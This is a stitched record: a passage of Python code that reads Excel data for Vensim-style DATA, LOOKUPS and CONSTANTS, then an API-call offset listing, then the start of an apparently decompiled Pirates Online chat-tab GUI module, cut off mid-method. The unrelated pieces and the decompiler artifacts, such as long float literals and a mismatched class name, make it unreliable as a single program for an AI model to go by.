+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
Function thar reads series and data from excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
                    + "\tDimension name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
# the lentgh of 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell like string, such as "A1", "b16", "AC19"...
If it is not a cell like string will return None.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
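    # For example (illustrative): _split_excel_cell("A1") returns (0, 0) and
    # _split_excel_cell("AC19") returns (18, 28); a cellrange name such as
    # "data_table" does not match the cell pattern and returns None.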
@staticmethod
def _reshape(data, dims):
"""
Reshapes an pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
Selects if a series data (DATA/LOOKUPS), should be read by columns,
rows or cellrange name.
Based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if series is given in a row, letter if series is
given in a column or name if the series is given by cellrange name.
cell: str
Cell identificator, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
# if the cell can be splitted means that the format is
# "A1" like then the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
Function thar reads data from excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data from topleft cell name using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
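# A minimal usage sketch (illustrative; the file, sheet and cell references
# below are hypothetical):
#
#     ext = ExtData(file_name='inputs.xlsx', sheet='Data', time_row_or_col='4',
#                   cell='B5', interp='interpolate', coords={}, root='.',
#                   py_name='ext_data_demand')
#     ext.initialize()      # reads the series and builds the internal DataArray
#     value = ext(2005.5)   # interpolated value at time 2005.5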
| [
"numpy.all",
"re.compile",
"openpyxl.load_workbook",
"xarray.broadcast",
"os.path.join",
"os.path.splitext",
"numpy.diff",
"os.path.isfile",
"numpy.array",
"numpy.empty_like",
"numpy.isnan",
"pandas.to_numeric",
"pandas.read_excel",
"warnings.warn",
"numpy.interp",
"re.findall",
"numpy.arange"
]
| [((16001, 16015), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (16009, 16015), True, 'import numpy as np\n'), ((16902, 16931), 'numpy.empty_like', 'np.empty_like', (['x'], {'dtype': 'float'}), '(x, dtype=float)\n', (16915, 16931), True, 'import numpy as np\n'), ((19042, 19071), 're.findall', 're.findall', (['"""\\\\d+|\\\\D+"""', 'cell'], {}), "('\\\\d+|\\\\D+', cell)\n", (19052, 19071), False, 'import re\n'), ((1349, 1405), 'openpyxl.load_workbook', 'load_workbook', (['file_name'], {'read_only': '(True)', 'data_only': '(True)'}), '(file_name, read_only=True, data_only=True)\n', (1362, 1405), False, 'from openpyxl import load_workbook\n'), ((10559, 10592), 'os.path.join', 'os.path.join', (['root', 'self.file[1:]'], {}), '(root, self.file[1:])\n', (10571, 10592), False, 'import os\n'), ((10609, 10634), 'os.path.isfile', 'os.path.isfile', (['self.file'], {}), '(self.file)\n', (10623, 10634), False, 'import os\n'), ((26592, 26633), 'numpy.all', 'np.all', (["(x > data['lookup_dim'].values[-1])"], {}), "(x > data['lookup_dim'].values[-1])\n", (26598, 26633), True, 'import numpy as np\n'), ((30529, 30543), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (30537, 30543), True, 'import numpy as np\n'), ((10692, 10723), 'os.path.isfile', 'os.path.isfile', (['(self.file + ext)'], {}), '(self.file + ext)\n', (10706, 10723), False, 'import os\n'), ((12025, 12048), 'numpy.isnan', 'np.isnan', (['series[i - 1]'], {}), '(series[i - 1])\n', (12033, 12048), True, 'import numpy as np\n'), ((12600, 12616), 'numpy.isnan', 'np.isnan', (['series'], {}), '(series)\n', (12608, 12616), True, 'import numpy as np\n'), ((12674, 12690), 'numpy.isnan', 'np.isnan', (['series'], {}), '(series)\n', (12682, 12690), True, 'import numpy as np\n'), ((13977, 13991), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (13985, 13991), True, 'import numpy as np\n'), ((26664, 26689), 'xarray.broadcast', 'xr.broadcast', (['data[-1]', 'x'], {}), '(data[-1], x)\n', (26676, 26689), True, 'import xarray as xr\n'), ((26706, 26805), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')\n", (26719, 26805), False, 'import warnings\n'), ((26856, 26896), 'numpy.all', 'np.all', (["(x < data['lookup_dim'].values[0])"], {}), "(x < data['lookup_dim'].values[0])\n", (26862, 26896), True, 'import numpy as np\n'), ((34649, 34683), 'numpy.arange', 'np.arange', (['col_first', '(col_last + 1)'], {}), '(col_first, col_last + 1)\n', (34658, 34683), True, 'import numpy as np\n'), ((835, 869), 'pandas.to_numeric', 'pd.to_numeric', (['ex'], {'errors': '"""coerce"""'}), "(ex, errors='coerce')\n", (848, 869), True, 'import pandas as pd\n'), ((3158, 3185), 'os.path.splitext', 'os.path.splitext', (['self.file'], {}), '(self.file)\n', (3174, 3185), False, 'import os\n'), ((8183, 8203), 'numpy.array', 'np.array', (['[[series]]'], {}), '([[series]])\n', (8191, 8203), True, 'import numpy as np\n'), ((9144, 9162), 'numpy.array', 'np.array', (['[[data]]'], {}), '([[data]])\n', (9152, 9162), True, 'import numpy as np\n'), ((13609, 13624), 'numpy.diff', 'np.diff', (['series'], {}), '(series)\n', (13616, 13624), True, 'import numpy as np\n'), ((23945, 24042), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' + 'extrapolating data above the maximum value of the time'\n )"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the time')\n", (23958, 
24042), False, 'import warnings\n'), ((26927, 26951), 'xarray.broadcast', 'xr.broadcast', (['data[0]', 'x'], {}), '(data[0], x)\n', (26939, 26951), True, 'import xarray as xr\n'), ((26968, 27067), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')\n", (26981, 27067), False, 'import warnings\n'), ((27145, 27166), 'xarray.broadcast', 'xr.broadcast', (['data', 'x'], {}), '(data, x)\n', (27157, 27166), True, 'import xarray as xr\n'), ((27713, 27812), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')\n", (27726, 27812), False, 'import warnings\n'), ((19272, 19296), 're.compile', 're.compile', (['"""[^a-zA-Z]+"""'], {}), "('[^a-zA-Z]+')\n", (19282, 19296), False, 'import re\n'), ((24165, 24262), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' + 'extrapolating data below the minimum value of the time'\n )"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the time')\n", (24178, 24262), False, 'import warnings\n'), ((27947, 28046), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')\n", (27960, 28046), False, 'import warnings\n'), ((912, 961), 'pandas.read_excel', 'pd.read_excel', (['file_name', 'sheet_name'], {'header': 'None'}), '(file_name, sheet_name, header=None)\n', (925, 961), True, 'import pandas as pd\n'), ((17386, 17410), 'numpy.interp', 'np.interp', (['value', 'xr', 'yr'], {}), '(value, xr, yr)\n', (17395, 17410), True, 'import numpy as np\n')] |
# File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
        TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
        return ChatTab(self, name, **kw)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
        TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
        newWhisperTab = WhisperTab(self, name, **kw)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
        DirectFrame.__init__(self, parent, *args, **kw)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
